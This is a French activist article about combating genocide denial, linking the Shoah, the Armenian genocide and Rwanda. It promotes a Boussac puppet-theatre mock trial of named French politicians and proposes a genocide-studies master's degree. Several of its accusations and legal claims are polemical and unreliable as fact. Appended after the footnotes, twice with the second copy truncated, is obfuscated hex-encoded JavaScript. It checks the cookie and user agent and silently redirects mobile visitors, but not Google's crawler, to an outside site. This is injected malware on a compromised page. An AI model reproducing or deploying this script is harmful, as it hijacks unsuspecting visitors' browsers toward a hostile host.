Educations RE-FONDATRICES: Eradiquons les négationnismes avec films et Théâtre-Art’s performing

ARLEQUINADES de BOUSSAC : De nos Commémorations-EDUCATION-ARTS

Introduction :  Contre le refoulé de la Shoah et du Rwanda, en France et ailleurs…

IL est un fait que la création théâtrale rencontre dans sa longue Histoire, une expérience très concrète contre toutes les formes de négationnismes.

Et l’Histoire du Théâtre et des Arts contemporains, des Sciences laissent toujours aboyeux les préféreux de l’ignardise enshortés vendus et corrompus avec les négationnistes des Savoirs.

Faire face aux négationnismes :  Arménie-Shoah-Rwanda

Or, associer pour les commémorations officielles de l’ONU du 27 janvier 2013, en une forme de Conférence-Spectacle, l’histoire de la Shoah avec l’histoire du génocide perpétré contre les Arméniens et l’histoire du génocide perpétré contre les Tutsi en 1994, rencontre tant une forme de comparatisme pratique, qu’une invitation donc à phénoménologiser contre les formes génocidaires récidivistes et négationnistes du 20ème siècle passé.

Ethique du comparatisme intelligent : une PRAXIS

La conférence donnée par Jean-Luc Galabert, a situé historiquement et aussi sociétalement de nos jours, par l’histoire sociale et culturelle du Rwanda, ce rapport contre les négationnismes avérés : par les Enfants d’Imana, et depuis l’histoire ancienne du Rwanda et des rwandais durant un siècle de colonisation, en démontrant donc tant l’inanité des idéologies ethniques qu’encore la réalité historique rwandaise.

Quand donc, le spectacle « Arlequinades ! / CPI-BCAG : Procès des criminels français au Rwanda »   a esté contre les formes de négations conséquentes à l’implication génocidaire française, et acta d’une première mondiale en soi : puisqu’en l’actualisation réelle des applications juridiques, ce spectacle démontre aussi que, d’après les éléments de preuves existants, et avec tous les rapports et enquêtes établies, il est non seulement possible mais encore très intéressant d’aborder très concrètement la réalité de ce procès « fictif ».

15 000 Oradour/Glane au RWANDA : un génocide français ?

Si la factualité historique de l’implication génocidaire française au Rwanda pourrait s’écrire : « 15 000 Oradour/Glane au Rwanda », alors nos actions, notre combat, en France Universelle Consciente se doivent de comprendre la gravité des faits récidivés depuis la Shoah.

Depuis que les Juges et Magistrats indépendants, à compétence universelle, POUX et TREVIDIC[1] ont repris en mains l’enquête internationale sur l’implication de  la France dans le génocide au Rwanda, à tout le moins, la Justice internationale montre à nouveau tant un visage digne et humain qu’une réelle compétence.

Or, si ESTER en Justice est une normativité pour « faire face aux négationnismes », il est acquis que notre objectif est d’ERADIQUER toutes les formes de négationnismes refoulées.

1 – ACTIONS JURIDIQUES

Si  l’enquête de POUX et TREVIDIC s’attaque directement à l’implication française jusqu’aux criminels français impunis (tel le criminel  barril), il est à comprendre que, contre toutes les formes de négationnismes, nous pouvons attaquer les négationnistes en Justice, depuis la Loi Gayssot, jusques aux lois internationales.

Laurent LEYLAKIAN[2], de la Fédération Euro-Arménienne est un des initiateurs qui, depuis 2006, fut à la pointe du combat pour NORMALISER la législation européenne, pour réprimer les négationnistes.

Or, si en France, le débat juridique sur les lois anti-négationnistes a été instrumentalisé politiquement, c’est de manière affligeante, pour diviser et communautariser le débat.

Ainsi, alors que la loi de 2001 en France, pour punir les négationnistes du génocide perpétré contre les Arméniens, suffit en soi pour condamner alors aussi toutes les formes de négations, le débat juridique d’aujourd’hui est bien celui d’une actualisation globale qui, de l’Arménie à la Shoah, et de la Shoah au Rwanda, se doit de mettre en place une LEGISLATION COMMUNE, condamnant tous ces négationnismes dans une même loi-cadre.

Là encore, la Cour Pénale Internationale, depuis le Congrès de Genève en 2003, invite et incite au Droit Performatif, c’est-à-dire à toutes actions individuelles ou collectives qui promeuvent et actent de la condamnation des négationnistes de crimes contre l’Humanité et de génocide.

Or donc, alors que l’on voudrait nous faire croire :

-          soit à des formes de blocages juridiques[3]

-          soit à de fausses avancées commémoratives repoussant le cas du Rwanda[4]

la réalité juridique est bien autre : c’est pourquoi AUSSI, la Responsabilité d’Acter d’un Procès Fictif, en Théâtre, « des criminels français génocidaires au Rwanda » rencontre :

-          non seulement la réalité de la CPI : des procès fictifs préparatoires aux mises en instructions réelles

-          qu’aussi la réalité actée de notre Droit Performatif :

Puisque nous possédons assez de faits historiques, de témoignages de survivants, d’éléments de preuves et pièces à conviction, pour faire valoir en Justice la réalité de notre Connaissance.

C’est donc ce qu’ont démontré ces ARLEQUINADES, qui encore en actualisations, donnent corps à la réalité d’une intervention juridique performative dont la légitimité n’est pas sans rappeler celle de Brecht dans « le procès de Galilée » et du Groupov en « Rwanda 94 ».

 

 

2-      ACTIONS SOCIETALES

Si, de Appui-Rwanda à Dieulefit, de Boussac à Saint-Ouen, de Strasbourg à Toulouse, de Nancy  à Paris, nombre d’associations, de collectifs, d’Asbl [5] ont, comme à Nantes encore, œuvré tant à l’aide à la reconstruction pour le Rwanda, qu’aux échanges culturels et à la diffusion de témoignages, c’est à Bègles-Bordeaux que les plaintes de survivantes rwandaises contre des criminels français ont été déposées : or là encore, entre les actions sociétales, l’action du Collectif des Parties Civiles pour le Rwanda-CPCR, et la réalité des mises en instructions des criminels français, la globalité de la situation dégage des actualisations en cours sur trois niveaux :          – L’action de Poux et Trévidic : démasquant l’implication génocidaire française depuis l’enquête sur l’attentat du 6 avril 1994, jusqu’au dossier barril : voire l’article dans Le Parisien du 24/1/2013

-          Le CPCR : pour les arrestations des criminels rwandais dissimulés en France depuis 1994 : une première arrestation a été faite à Longvic, près de Dijon ce 22/1/2013.

-          Annie Faure : en les plaintes des survivantes rwandaises accusant de viols et crimes contre l’Humanité des ex-militaires français.

Le procès fictif « CPI-BCAG : procès des criminels français génocidaires au Rwanda », en Work-in-Progress, parmi ces actions sociétales et juridiques, tend à mettre en synthèse active cette réalité, jusques dans sa dimension performative : puisque déjà avoir condamné au Théâtre, symboliquement en assemblée publique, les criminels « mitterand-védrine, balladur, juppé, sarkozy, lanxade, lafourcade, quesnot, barril et d’autres ex-soldats français », génocidaires à BISESERO, c’est avoir présenté la REALITE  CONCRETE  JUSQU’A  LAQUELLE  NOUS DEVONS ARRIVER.                                              

Pour ce faire, cet article propose une actualisation de la définition de négationnisme.

3 – DEFINITION du négationnisme : RAPPEL HISTORIQUE et actualisations

Depuis les premiers combats menés par Pierre Vidal-Naquet [6] et Maxime Steinberg[7], c’est Husson qui définit en 1988, le néologisme de « négationnisme », pour faire condamner et réprimer les « révisionnistes » de la Shoah qui voulaient NIER l’existence des chambres à gaz.

Or tel que l’a magistralement rappelé Laurent JOLY[8] ce 27 janvier à Paris, aux « Assises contre les négationnismes », c’est depuis l’Affaire Dreyfus, que les « darquier de pellepoix » et autres vichystes démasqués tel faurisson, ont fomenté le courant anti-juif, vichyste, collaborant aux nazis, ce courant révisionniste-négationniste qui a fournit le terreau génocidaire aux mitterand, juppé, balladur, sarkozy et péan, qui sont maintenant les révisionnistes du Rwanda et qui veulent NIER l’existence des environ 15 000 « Oradour-sur-Glane » perpétrés à BISESERO et ailleurs au Rwanda, par des criminels militaires français.

Or, cette définition de négationnisme n’a pas été actualisée depuis 1994 : quand pourtant nous connaissons bien les nouvelles formes de négations émergées depuis l’implication génocidaire française de 1990 à 1994. Aussi :

1)      Depuis 1994, ces formes STRUCTURELLES  de négationnismes français oscillent entre :     

a) une fausse législation xénophobe concernant « les étrangers » toujours connotée de la notion raciste « d’indésirables » depuis 1938, que les études telles celles d’Ilsen About[9], entre autres, ont aussi expliqué historiquement depuis la Shoah                                         

b) et une idéologie nationale vichysto-négationniste, dénoncée par Zeev Sternhell[10].

 

Ce NEGATIONNISME STRUCTUREL français, dénoncé encore tout récemment par Charlotte Lacoste jusqu’en un courant néo-négationniste[11], a été encore démasqué quant à ce qui depuis les « faurrisson-lepénistes-péan », émerge depuis peu en les « chiraqueux-sarkozo-triweillerdistes » qui, jusqu’aux fausses rhétoriques sur le Kivu, tentent d’entraver par leur négationnisme toutes les applications juridiques et éducationnelles, publications et recherches quand au génocide perpétré contre les Tutsi en 1994 : surtout contre toutes informations concernant l’implication française au Rwanda, et pour cause, puisque ces négationnistes y seraient et y sont très gravement impliqués.

2)      C’est ce NEGATIONNISME français CONSEQUENT  à l’implication génocidaire française au Rwanda que nous dénonçons aujourd’hui tel que :

a.       Un NEGATIONNISME D’ETAT : identique à celui des turcs contre la reconnaissance du génocide perpétré contre les Arméniens. D’ailleurs Séta Papazian[12] a encore dénoncé les liens directs, politiques et économiques, entre les négationnistes turcs et français, contre l’Arménie et le Rwanda.

b.      Ce négationnisme conséquent aux crimes perpétré par des français au Rwanda, est aussi un négationnisme conséquent au négationnisme d’état « imposé » et suivi par tous les gouvernements français depuis 1994.

                                c.    Quand donc les formes de NEGATIONNISME AVEREES, sont aujourd’hui celles qui, du criminel péan et jusques dans la presse nationale                                                  été dénoncées par Patrick de Saint-Exupéry, encore ce 27 janvier 2013, spécifiquement contre « Le Monde » :

-          Non seulement quant à la factualité des dénis :

o   De faits Juridiques : actualisations contre barril, de Poux et Trévidic

o   De Témoignages de survivants et de survivantes : « enquête Farnel »

o   De rapports d’enquêtes officiels et expertises officielles : rapport Mucyo

-          Mais encore quant à la « méséducation » des journalistes « qui ont avoué » :

o   Leur dépendance mentale vis à vis des « autorités » : par peur

o   Leur « non spécialisation » : quelquefois jusqu’à friser l’indécence devant leur peu de travaux et recherches

Ces 3 formes de NEGATIONNISME, STRUCTUREL, CONSEQUENT et AVERE,  à comprendre tel un modèle conceptuel aussi[13], forment l’actualisation MINIMALE de notre bonne compréhension, historique, juridique et sociétale, de « l’histoire du négationnisme » et de ces formes larvées jusqu’à aujourd’hui : telle celle du dossier « Kivu » qui a fait démasquer[14] une minable oligarchie ploutocrate négationniste française, impliquée en fait dans les tentatives de nier l’implication génocidaire française au Rwanda. Comme les nazis voulaient faire nier le génocide perpétré contre les Arméniens.

 

4 – COMBATS JURIDIQUES et EDUCATIONS

Quand maintenant donc,

-          Des différentes lettres du CPCR par Gauthier, au ministère de la Justice en France, actuellement « coupable de négationnisme »

-          Aux actions internationales menées par Martin N’Goga et la Commission Nationale de Lutte contre le Génocide et le Gouvernement Rwandais pour lancer des instructions internationales contre les criminels français négationnistes

-          Jusques à la CPI donc,

nos combats contre toutes les formes de négationnismes se structurent à différents niveaux :

Il apparait EVIDENT que, des formes de mises en instruction débouchant sur des actions pédagogiques, aux formes REELLES D’EDUCATION, notre combat dusse s’orienter sur la Mise en Matériaux Educatifs à tous les niveaux : pour enseigner le Droit International comme l’Histoire réelle, les réflexions sociétales et philo-praxis qui leur sont attenantes et corrélatives.

 

5 : Du DEBAT PUBLIC au MASTER in Prevention and genocides Studiesen France

Or si, depuis à peine 2 ans, voire depuis un an, l’amorce d’un débat public commence à émaner en France (documentaires sur Gauthier à France 2 en juin et septembre 2012, quelques articles de presse corrects, montée en puissance des réseaux associatifs, conférences et Arts…), il est à bien comprendre que la phénoménologie de la récidive de la Shoah au Rwanda est encore davantage grave que :

-          La collaboration vichyste aux nazis

-          Les crimes commis en Algérie

-          La « françafrique colonialiste »

Il s’agit bien d’inclure, depuis les Educations à l’Histoire de la Shoah, ce cas de RECIDIVE DE GENOCIDE, perpétré par « la France » au Rwanda, 50 ans après la Shoah, comme le seul et unique cas de récidive de GENOCIDE  reconnu JURIDIQUEMENT aux niveaux internationaux[15].

S’il s’agit d’une réflexion grave, et lourde de conséquences, il est aussi question, en cette Reconstruction Internationale, d’éradiquer toutes les formes d’impunités dont les risques majeurs sont ceux de nouvelles récidives.

Or, ce point bien compris nous exhorte A ACTUALISER TOUS LES NIVEAUX EDUCATIFS :

-          Tel que ceci a été initié au Rwanda par monsieur Jean de Dieu MUCYO et la CNLG depuis oct. 2008/juillet 2009, et qui a donné naissance à un degré de « Master in Prevention and genocides studies » [16]

-          En France donc : pour produire un identique degré de RESPONSABILITE

Quand ces actualisations en Master sont en cours actuellement et depuis 2011 :  à l’Université de South California-USC, USA, avec aussi l’IGSC-Librairy (Interdisciplinary Genocide Studies Center) , en Angleterre à l’Université de Londres-Kingston, à l’Université de Sienne en Italie, et encore en Hollande à l’Université d’Amsterdam, et en Pologne à l’université de Varsovie.

Ceci doit devenir une NORMATIVISATION en France.

Là, à cause de l’implication génocidaire française au Rwanda, la France connait aussi, depuis Jean-Paul Gouteux et la revue La Nuit rwandaise, les meilleurs chercheurs qui sont à même de devenir les futurs enseignants et professeurs à ce degré de Master en France. Cette proposition de Master en sa transcription française[17], a été faite à Mme Claire Mouradian, directrice de recherche au CNRS et à l’EHESS, à Charlotte Lacoste, à Serge Farnel et à Jean-Luc Galabert qui, avec le Collectif VAN et Sétia Papazian, le Mémorial de la Shoah, IBUKA, et les enseignants, professeurs-chercheurs sont à même d’INITIER et de REALISER cet équivalent de Master en France, qui deviendra alors notre meilleur OUTIL pour tant faire face aux négationnismes que pour les ERADIQUER concrètement par l’EDUCATION.

 

CONCLUSION :

Du Juridique et combat pédagogique, aux rapports EDUCATIONNELS actualisés, ce sont l’Ecriture de COURS, d’après les Recherches publiées, comme la présentation d’œuvres d’ART, qui sont nos OUTILS ACTUELS pour inscrire les faits historiques, les témoignages de survivants, les réflexions philosophiques et les échanges culturels dans notre Mémoire Collective comme surtout dans NOTRE PRAXIS SOCIETALE.                                                                                                                           

La Conférence/Spectacle « ARLEQUINADES »[18] vient d’en démontrer tant le possible, que la réalité actée et concrètement Responsable.

C’est à nous d’en formaliser la réalité sociétale aux niveaux :                                 

 .juridiques : des arrestations et procès des criminels, aux lois condamnant les négationnistes           

.éducatifs : de la structuration d’un Master, aux cours et œuvres d’Art à diffuser dans les qualités des outils du 21ème siècle                                                                                                                             

FAIRE FACE AUX NEGATIONNISMES, c’est bien.

Mais nous nous devons de les éradiquer entièrement, sous toutes leurs formes, structurelles, conséquentes et avérées.

La transformation sociétale JUSTE est à ce prix : Donnons-nous en la RESPONSABILITE, pour nous-mêmes comme pour toutes les générations futures.

Laurent BEAUFILS-SEYAM.

Précision : La Performance –Théâtre intitulée « ARLEQUINADES !  CPI-BCAG : Procès des criminels français génocidaires au Rwanda » est encore en Work-In-Progress, en actualisations donc.  Celle-ci est la suite de la création de Standnow-France/Standnow-Rwanda, avec Samuel Ufitimana Kinimba,  le 4 octobre 2008,  qui initia une correspondance épistolaire entre les enfants de Boussac et les enfants survivants de Kimironko à KIGALI. Madame Simone Veil a soutenue cette initiative quand messieurs Farnel et Gauthier ont donné deux conférences. Ce 26 janvier 2013, c’est monsieur Jean-Luc Galabert qui donna une conférence juste avant la présentation de la Performance –Théâtre. Cette Performance actualise les rapports juridiques et éducatifs, dans une synthèse dramaturgisée qui,                                                                                                                                

 - des Témoignages de Survivants                                                                                                                               

 - aux Questions de Représentations de l’Histoire, en ART                                                                             

propose une inter-activité immédiate entre Public et Actants.

. Nous organisons actuellement le troisième  degré de réalisation-concrétisation de cette Performance, alors que depuis février-début mars 2013, celle-ci a été actée à Paris. Avec encore d’autres conférenciers.                                                                                                                                          

. Un troisième degré est donc encore prévu……. telle la mise en disponibilité d’une Intervention/ Spectacle-Outil/Conférence

Nous invitons toutes les personnes intéressées à :  

- prendre contact auprès de : Laurent BEAUFILS-SEYAM , Cie des Arlequinades/CRIAEAU

6 place de l’Hôtel de Ville, 23 600 BOUSSAC

E-mail : seyam07@yahoo.fr, / laurentbeaufils@criaeau.org 

Téléphone : Fixe : 05 55 82 04 64/ Portable : 00(33)06 83 95 92 02

-comme à diffuser ces informations, des témoignages et actualisations juridiques jusques aux interventions éducatives et d’Art.

« Arlequino-Juge de la Cour Pénale Internationale des Enfants du 21ème siècle ouvre le Procès des criminels français génocidaires au Rwanda. » Photos et extraits filmés de cette performance-Théâtre en actualisation seront accessibles sur le site VEA-CRIAEAU et/ou sur demande à l’adresse écrite ci-dessus.

 

ARLEQUINADES !

 

Commémorations-EDU-ARTS du 27/1/2013

68ème anniversaire de la Libération du camp d’Auschwitz  Square des Justes des nations de Boussac.

 

Remerciements  à tous les partenaires : IBUKA, Collectif VAN, La Nuit rwandaise, la Commission d’Enquête citoyenne pour le Rwanda, le Collectif des Parties Civiles pour le Rwanda, Génocide made in France, messieurs Serge Farnel, Jean-Luc Galabert, mesdames Charlotte Lacoste, Claire Mouradian, la Commune de Boussac, Standnow-France et Standnow-Rwanda, la Commission Nationale de Lutte contre le génocide, monsieur Jean de Dieu Mucyo. Spécial « Coup de Chapeau » à tous les Boussaquins et toutes les Boussaquines.

(Des extraits de films avec les séquences : « Parade de Purim », « Histoire du Square des Justes des nations de Boussac », « Arlequino-Roi présente le témoignage d’Eric Nzibihimana », et « Arlequino donne Cours de Droit International à l’Ecole Laïque Universelle pour Marionnettes » sont inclues aussi.)

 

Avant le spectacle…Mise des Masques pour le Public !

 

 des journalistes très consciencieuses ….

 

 Arlequino lance le début de la Parade… !!!!!!!!!!!!!

 

Parade… en musique originale de Purim ! 

Récit de l’Histoire d’Esther voici 2500 ans …de l’Oratorio d’Esther, devenu par la Marche de Mordecaï, la musique de la Marseillaise …et actualisation contre les criminels après la Shoah de cette grande fête contre l’impunité !

 

Entrée en Fête contre l’impunité ! 

 

 

Peinture Hommage à Talinsky,  récit de l’Histoire des Justes, des enfants cachés à Boussac durant la Shoah….

 

D’Esther à Esther UWAYISENGA de BISESERO….

Les témoignages de survivants de Bisesero…Arlequino va réveiler UNE Marionnette-Main…

de l’Humain du 21ème siècle…

et alors que le balai  ne veut pas  travailler…

 

« Arlequino-Roi » présente les photographies de la libération des enfants du camp d’Auschwitz le 27-1-1945

Présentation du témoignage d’Eric Nzibihimana, survivant de Bisesero.

Arlequino propose alors de réveiller toutes les Marionnettes ….

en  racontant Esther  en  l’Histoire de l’Art et du Théâtre….

                             Le Public réveille alors les Marionnettes…

                              Et le réveil des Marionnettes pour aller juger les négationnistes, c’est une Fête ! Contre l’impunité !

Jusqu’avant d’entrer… à l’Ecole Laïque Universelle des Marionnettes …

Pour un double-cours:

-         « Histoire du Droit International » en chansons,

-          « Epistémologie Shoah-Rwanda en l’actualisation de la CPI »…

Quand,  alors, tout le monde prend l’avion pour la CPI….

 un petit lapin, en théâtre d’ombre désire témoigner (à la place du film « de voyage ») …*

Et , après l’arrivée à la CPI, où la Cour a proposé un documentaire de synthèse, de Génocide Made in France, sur l’implication française génocidaire au Rwanda,  et contre l’impunité,

le Procureur de la Cour Pénale Internationale des Enfants du 21ème siècle, OUVRE :

            « Le Procès des criminels français génocidaires au Rwanda ! »

Avec le Comité d’Ethique des Survivants : Témoignages en Castelet et Théâtre d’Ombres en fantasmagories…

Après le procès des « politiques », une Marionnette  lit le Témoignage d’Esther Mujawayo au Juge…

Et après les « lancers de boules de chiffon »  sur les têtes-réduites des accusés militaires, journalistes négationnistes et financiers du génocide » en une Baraque de Foire, Enfants et Adultes ACTEURS ont salué avec les Marionnettes, le Public, qui, avec ses Marionnettes, a esté et acté du « Procès fictif contre  les criminels français génocidaires au Rwanda » : En cette COUR  PENALE  INTERNATIONALE  DES  ENFANTS du 21ème siècle.

Eradiquons les négationnismes avec films et Théâtre – Art’s performing: CRIAEAU en actualisations

 


[1] Voire les rapports officiels publiés et encore le récent article de presse dans Le Parisien

[2] Voire le site de la Fédération Euro-Arménienne à Bruxelles

[3] Le cas affligeant de la très médiocre Ministre de la Justice actuellement est un cas de négationnisme avéré

[4] Voire les fausses avancées pour les Commémorations Arméniennes pour nier les Commémorations rwandaises

[5] Vire les sites correspondants de CAURI à SURVIE, d’APPUI-RWANDA à Bruce Clarke, d’IZUBA à La Nuit rwandaise, de la Commission d’enquête citoyenne pour le Rwanda –CEC à Charlotte Lacoste, de GMIF-Génocide Made in France à Association France-Rwanda-Génocide, Rwanda 13 mai 1994, un massacre français ?

[6] Pierre Vidal-Naquet : « Les assassins de la Mémoire »,Points Essais n°202, 1987 . Voire sur Standnow-France l’article « Les assassins de la Mémoire Universelle » publié le 25 aout 2010.

[7] Maxime Steinberg : enfant survivant d’Auschwitz devenu historien : «Les yeux du témoin et  le regard du borgne ». cerf, 2000. Maxime Steinberg est intervenu au Tribunal de Bruxelles pour faire condamner les femmes catholiques génocidaires dont Eric Heyn à New-York a transcrit l’histoire dans la pièce intitulée « Maria Kizito », mise en scène tout dernièrement à La Mama par Emily Mendelssohn.

[8] Voire la thèse de Doctorat de Laurent  Joly : « Vichy dans la solution finale : histoire du commissariat général aux questions juives / 1941-1944», 2006, Grasset.

[9] Ilsen About : « Identifier les étrangers, genèse d’une police bureaucratique de l’immigration dans la France de l’entre-deux guerres », édition Noirel « L’identification des personnes, genèse d’un travail d’état », Belin, 2007

[10] Zeev Sternhell : « Ni droite, ni gauche, la France entre nationalisme et fascisme. L’idéologie fasciste en France », 2000, Fayard : première édition 1987.

[11] Charlotte Lacoste : « Les séductions du bourreau », Presses Universitaires de France, 2010

[12] Séta Papazian est la Présidente du Collectif VAN (Vigilance Arménienne contre tous les négationnismes) et est intervenue aux Assises contre le négationnisme à Paris ce 27 janvier 2013.

[13] Voire in « Vers l’Ethique appliquée » de Laurent BEAUFILS SEYAM, auto-édition, juillet 2012

[14] Voire les articles de Bruno Gouteux sur IZUBA

[15] Voire les jugements et décisions du TPIR : Tribunal Pénal International pour le Rwanda

[16] Voire le site de l’UNR : Université Nationale du Rwanda et le site de la CNLG : Commission Nationale de Lutte contre le génocide( et la « Lettre à Mucyo » in « Vers l’Ethique appliquée »- Tome 7)

[17] Voire « Vers l’Ethique appliquée » de Laurent Beaufils, tome 7, autoédition, 2012.

[18] Voire le site, en construction actuellement, intitulé « VEA-CRIAEAU : Vers l’Ethique appliquée, un Centre de Recherche International Anti-génocidaire pour une Education Artistique Universelle »

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 